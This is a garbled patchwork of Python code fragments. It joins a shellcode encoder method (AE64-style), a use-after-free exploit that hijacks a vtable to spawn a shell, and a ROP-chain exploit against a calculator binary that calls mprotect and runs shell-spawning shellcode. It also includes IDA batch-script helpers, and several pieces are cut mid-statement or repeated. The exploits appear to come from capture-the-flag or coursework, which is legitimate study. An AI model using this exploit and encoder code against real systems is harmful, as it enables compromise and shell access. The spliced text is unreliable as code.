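def encode(self, raw_sc, addr_in_reg='rax', pre_len=0, is_rdi_zero=0):
    r'''Assemble the complete output: prologue + encoder + nop padding + encoded payload.

    raw_sc:      the machine code to encode.
    addr_in_reg: name of the register that points near the shellcode (default rax).
    pre_len:     because by default rax points *near* the shellcode, this gives
                 reg + pre_len == start address of the encoder (default 0).
    is_rdi_zero: whether rdi is 0 before the shellcode runs; if it is known to be 0
                 this flag can be set to 1 to save a few bytes (default 0, i.e. rdi
                 is not 0).
    encoder_len: maximum byte length reserved for the encoder (adjusted automatically,
                 stored on self.encoder_len).

    Address layout:
        rax --> xxxxx \
                xxxxx  | pre_len (adjust addr to rax)
                xxxxx /
        encoder yyyyy \
                yyyyy  | encoder_len
                yyyyy /
        your_sc zzzzz \
                zzzzz  | encoded shellcode
                zzzzz  |
                zzzzz /

    Returns the final byte string, or None when addr_in_reg is not in the
    self.vaild_reg allowlist or self.encode_raw_sc() reports failure.

    Side effects: sets self.prologue, self.raw_sc, self.pre_len and
    self.encoder_len; whatever self.encode_raw_sc() sets (self.enc_raw_sc is
    read afterwards). context.log_level is raised to 99 while assembling and is
    now restored on every exit path, including the two early returns, which
    previously left it at 99.
    '''
    save_log_level = context.log_level
    # Silence pwntools logging while we repeatedly call asm(); the verbose
    # summary below is deliberately emitted after the level is restored.
    context.log_level = 99
    try:
        if not is_rdi_zero:
            self.prologue = self.zero_rdi + self.init_encoder
        else:
            self.prologue = self.init_encoder

        addr_in_reg = addr_in_reg.lower()
        if addr_in_reg != 'rax':
            # Only an allowlisted register name is ever interpolated into the
            # asm() source; anything else is rejected before it reaches asm().
            if addr_in_reg not in self.vaild_reg:
                print('[-] not vaild reg')
                return None
            self.prologue = asm('push {};pop rax;\n'.format(addr_in_reg)) + self.prologue

        self.raw_sc = raw_sc
        self.pre_len = pre_len
        self.encoder_len = len(self.prologue)
        if not self.encode_raw_sc():
            print('[-] error while encoding raw_sc')
            return None

        # The assembled encoder size depends on the start address it is given
        # (pre_len + encoder_len), so re-assemble until the reserved length
        # covers the real length with at most 6 bytes of nop slack.
        # NOTE(review): if the assembled length never settles this loop does
        # not terminate -- confirm gen_encoder()'s output length is well behaved.
        while True:
            debug('AE64: trying length {}'.format(self.encoder_len))
            encoder = asm(self.gen_encoder(self.pre_len + self.encoder_len))
            final_sc = self.prologue + encoder
            slack = self.encoder_len - len(final_sc)
            if 0 <= slack <= 6:  # nop len
                break
            self.encoder_len = len(final_sc)
        nop_len = self.encoder_len - len(final_sc)
    finally:
        context.log_level = save_log_level

    success('shellcode generated, length info -> prologue:{} + encoder:{} + nop:{} + encoded_sc:{} == {}'.format(
        len(self.prologue),
        len(final_sc) - len(self.prologue),
        nop_len,
        len(self.enc_raw_sc),
        len(final_sc) + nop_len + len(self.enc_raw_sc)))
    # Pad with two-byte nops first, then a single-byte nop for an odd remainder;
    # integer division keeps this correct on Python 3 as well as Python 2.
    final_sc += self.nop2 * (nop_len // 2) + self.nop * (nop_len % 2) + self.enc_raw_sc
    return final_sc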
def worker(paths, script=None, args=None, handler=None):
    """Run run_ida_script() for every entry in *paths* and collect non-None results keyed by path.

    script, args and handler are passed through to run_ida_script unchanged;
    debug(path) is logged after each run.

    NOTE(review): in this excerpt the function ends right after filling
    ``result`` and has no ``return`` statement, so as shown it returns None --
    presumably a ``return result`` follows and was cut off here; confirm against
    the full file before relying on the return value.
    """
    result = {}
    for path in paths:
        tmp = run_ida_script(path, script, args, handler)
        debug(path)
        #info(path)
        # Only successful runs (non-None handler output) are kept.
        if tmp != None:
            result[path] = tmp
+8 will contain give_shell. We need to add our payload two times, since else only the woman instance is overwritten, and calling man will crash. """ pwn.context.terminal = ["tmux", "splitw", "-h"] exe = pwn.context.binary = pwn.ELF('./uaf') random_file = "/tmp/%s" % pwn.util.fiddling.randoms(10) size_of_new = 8 payload_length = size_of_new address_of_virtual_address_table = 0x401570 payload = pwn.p64(address_of_virtual_address_table - 8) + b'a' * (size_of_new - 8) pwn.debug(pwn.hexdump(payload)) gdbscript = ''' # Before "delete m;" break *0x00401082 # before "m->introduce();" break *0x00400fe2 # before "new" break *0x00401020 continue ''' if pwn.args.GDB: pwn.write('/tmp/payload', payload)
val = rop_chain[x * 4:(x + 1) * 4] val = pwn.u32(val) write_stack_offset(x + addr, val) mprotect_addr = exe.symbols['mprotect'] io = start() io.recvuntil("=== Welcome to SECPROG calculator ===\n") stack_addr = get_absolute_stack_address_below_main() stack_addr_mod_pagesize = stack_addr - (stack_addr % 4096) pwn.success("Stack absolute address is 0x%08x" % stack_addr) pwn.success("Stack absolute address mod pagesize is 0x%08x" % stack_addr_mod_pagesize) rop_chain = ( pwn.p32(mprotect_addr) + # return from calc, go to mprotect pwn.p32(stack_addr + 16) + # return address after mprotect, go to shellcode pwn.p32(stack_addr_mod_pagesize) + # mprotect param: addr pwn.p32(4096) + # mprotect param: page size pwn.p32(7) + # mprotect param: rwx pwn.asm(pwn.shellcraft.sh() ) # shellcode after stack has been marked executable ) pwn.debug("ROP chain:\n%s" % pwn.hexdump(rop_chain)) write_rop_chain_to_addr(main_ret_address_offset, rop_chain) io.sendline() io.interactive()
if os.path.exists(output_path): os.remove(output_path) if script_path == None: command = f"{IDA_PATH} -A -B {bin_abs_path}" else: if args != None: args = " ".join(args) else: args = "" command = f"{IDA_PATH} -A -S\"{script_path} {output_path} {arch} {args}\" {bin_abs_path}" command = f"IDALOG=\"{log_path}\" {command} " try: debug(F"Running script for {bin_abs_path}...") debug(command) subprocess.run(command, shell=True).check_returncode() debug("Done") except subprocess.CalledProcessError as e: warn(f"error happened in {bin_abs_path}, {e}") return None if os.path.exists(output_path): if handler!=None and script_path!=None : output = handler(output_path) return output def worker(paths, script=None, args=None, handler=None):